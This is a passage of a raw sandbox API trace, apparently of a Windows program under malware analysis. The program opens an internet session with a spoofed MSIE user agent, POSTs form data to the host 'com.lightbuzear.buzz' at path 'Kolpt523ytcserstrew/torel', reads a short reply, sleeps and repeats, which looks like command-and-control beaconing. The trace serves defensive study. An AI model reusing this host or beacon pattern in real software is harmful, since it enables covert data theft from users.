hHeap=0x4780000) returned 1 [0245.050] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6b0 [0245.050] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0245.050] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0245.050] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0245.050] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48159c8 [0245.050] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0245.050] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815950 [0245.050] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48159c8 | out: hHeap=0x4780000) returned 1 [0245.050] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0245.050] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815950 | out: hHeap=0x4780000) returned 1 [0245.050] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800be0 [0245.050] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0245.050] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0245.050] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800be0 | out: hHeap=0x4780000) returned 1 [0245.050] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800ac8 [0245.050] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0245.050] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800eb0 [0245.051] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0245.051] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0245.051] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0245.051] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0245.051] FreeLibrary (hLibModule=0x71780000) returned 1 [0245.052] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800eb0 | out: hHeap=0x4780000) returned 1 [0245.052] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0245.052] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800f00 [0245.052] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0245.052] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0245.052] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0245.052] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0245.052] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce690 [0245.052] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0245.052] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6a0 [0245.052] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0245.053] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0245.053] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0245.053] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48159c8 [0245.053] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0245.053] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815ad0 [0245.053] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48159c8 | out: hHeap=0x4780000) returned 1 [0245.053] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0245.053] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815ad0 | out: hHeap=0x4780000) returned 1 [0245.053] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815950 [0245.053] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800d70 [0245.053] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800d70 | out: hHeap=0x4780000) returned 1 [0245.053] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0245.053] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800d48 [0245.053] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0245.053] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800d98 [0245.053] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0245.054] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce610 [0245.054] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0245.054] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce600 [0245.054] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0245.054] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6a0 [0245.054] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0245.054] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0245.054] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0245.054] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815968 [0245.054] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0245.054] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815a10 [0245.054] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815968 | out: hHeap=0x4780000) returned 1 [0245.054] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0245.054] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815a10 | out: hHeap=0x4780000) returned 1 [0245.054] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815ad0 [0245.054] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800be0 [0245.055] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800be0 | out: hHeap=0x4780000) returned 1 [0245.055] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0245.055] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0245.055] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0245.055] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5b0 [0245.055] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0245.055] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce630 [0245.056] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0245.056] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6d0 [0245.056] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0245.056] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0245.056] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0245.056] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815830 [0245.056] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0245.056] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815848 [0245.056] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815830 | out: hHeap=0x4780000) returned 1 [0245.056] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0245.056] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815848 | out: hHeap=0x4780000) returned 1 [0245.056] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800c30 [0245.056] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0245.056] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0245.056] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800c30 | out: hHeap=0x4780000) returned 1 [0245.056] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800cf8 [0245.056] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba58 [0245.056] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800dc0 [0245.056] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba58 | out: hHeap=0x4780000) returned 1 [0245.057] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0245.057] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0245.057] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0245.058] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800dc0 | out: hHeap=0x4780000) returned 1 [0245.076] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0245.076] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6e0 [0245.076] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0245.076] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce630 [0245.076] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0245.076] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0245.076] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0245.076] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0245.076] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0245.076] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815a40 [0245.076] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0245.077] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815830 [0245.077] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815a40 | out: hHeap=0x4780000) returned 1 [0245.077] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0245.077] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815830 | out: hHeap=0x4780000) returned 1 [0245.077] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800d20 [0245.077] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0245.077] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb898 [0245.077] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800d20 | out: hHeap=0x4780000) returned 1 [0245.077] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800d20 [0245.077] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbf28 [0245.077] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800d70 [0245.077] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0245.078] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0245.078] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0245.078] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0246.399] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800d70 | out: hHeap=0x4780000) returned 1 [0246.399] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6c0 [0246.399] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce620 [0246.400] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0246.400] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce680 [0246.400] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5c0 [0246.400] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0246.400] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce640 [0246.400] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0246.400] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0246.400] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0246.400] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0246.400] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0246.400] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815a10 [0246.400] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0246.400] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815a28 [0246.400] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815a10 | out: hHeap=0x4780000) returned 1 [0246.400] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0246.400] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815a28 | out: hHeap=0x4780000) returned 1 [0246.400] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800e10 [0246.400] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0246.401] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0246.401] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800e10 | out: hHeap=0x4780000) returned 1 [0246.401] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800de8 [0246.401] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbf28 [0246.401] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800e10 [0246.401] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0246.407] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0246.407] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0246.407] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0246.408] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800e10 | out: hHeap=0x4780000) returned 1 [0246.408] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0246.408] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6f0 [0246.408] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6d0 [0246.408] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0246.408] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce630 [0246.408] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0246.408] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5f0 [0246.408] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0246.408] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0246.408] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0246.408] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815830 [0246.409] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0246.409] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815998 [0246.409] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815830 | out: hHeap=0x4780000) returned 1 [0246.409] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0246.409] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815998 | out: hHeap=0x4780000) returned 1 [0246.409] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800d70 [0246.409] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0246.409] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0246.409] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800d70 | out: hHeap=0x4780000) returned 1 [0246.409] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800d70 [0246.409] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd68 [0246.409] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800aa0 [0246.409] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd68 | out: hHeap=0x4780000) returned 1 [0246.410] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0246.410] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0246.410] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0246.411] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800aa0 | out: hHeap=0x4780000) returned 1 [0246.411] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0246.411] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0246.411] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0246.411] FreeLibrary (hLibModule=0x71570000) returned 1 [0246.411] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0246.411] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0246.411] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800d98 | out: hHeap=0x4780000) returned 1 [0246.412] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800d48 | out: hHeap=0x4780000) returned 1 [0246.412] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f00 | out: hHeap=0x4780000) returned 1 [0246.412] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800c80 | out: hHeap=0x4780000) returned 1 [0246.412] Sleep (dwMilliseconds=0x2710) [0246.427] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0246.427] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5e0 [0246.427] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0246.427] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce690 [0246.427] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0246.427] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0246.427] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0246.427] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce630 [0246.427] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0246.427] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815878 [0246.427] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0246.427] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48159c8 [0246.427] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815878 | out: hHeap=0x4780000) returned 1 [0246.427] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0246.427] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48159c8 | out: hHeap=0x4780000) returned 1 [0246.427] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815998 [0246.427] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800af0 [0246.428] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800af0 | out: hHeap=0x4780000) returned 1 [0246.428] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0246.428] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800eb0 [0246.428] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0246.428] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce740 [0246.428] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6c0 [0246.428] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0246.428] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0246.428] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0246.429] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6f0 [0246.429] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0246.429] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0246.429] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0246.429] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815938 [0246.429] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0246.429] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815860 [0246.429] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815938 | out: hHeap=0x4780000) returned 1 [0246.429] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0246.429] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815860 | out: hHeap=0x4780000) returned 1 [0246.429] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800f00 [0246.429] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0246.429] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe48 [0246.429] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f00 | out: hHeap=0x4780000) returned 1 [0246.429] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800d48 [0246.429] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba20 [0246.429] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800e60 [0246.430] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0246.430] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0246.430] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0246.430] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0246.430] FreeLibrary (hLibModule=0x71780000) returned 1 [0246.431] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800e60 | out: hHeap=0x4780000) returned 1 [0246.431] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 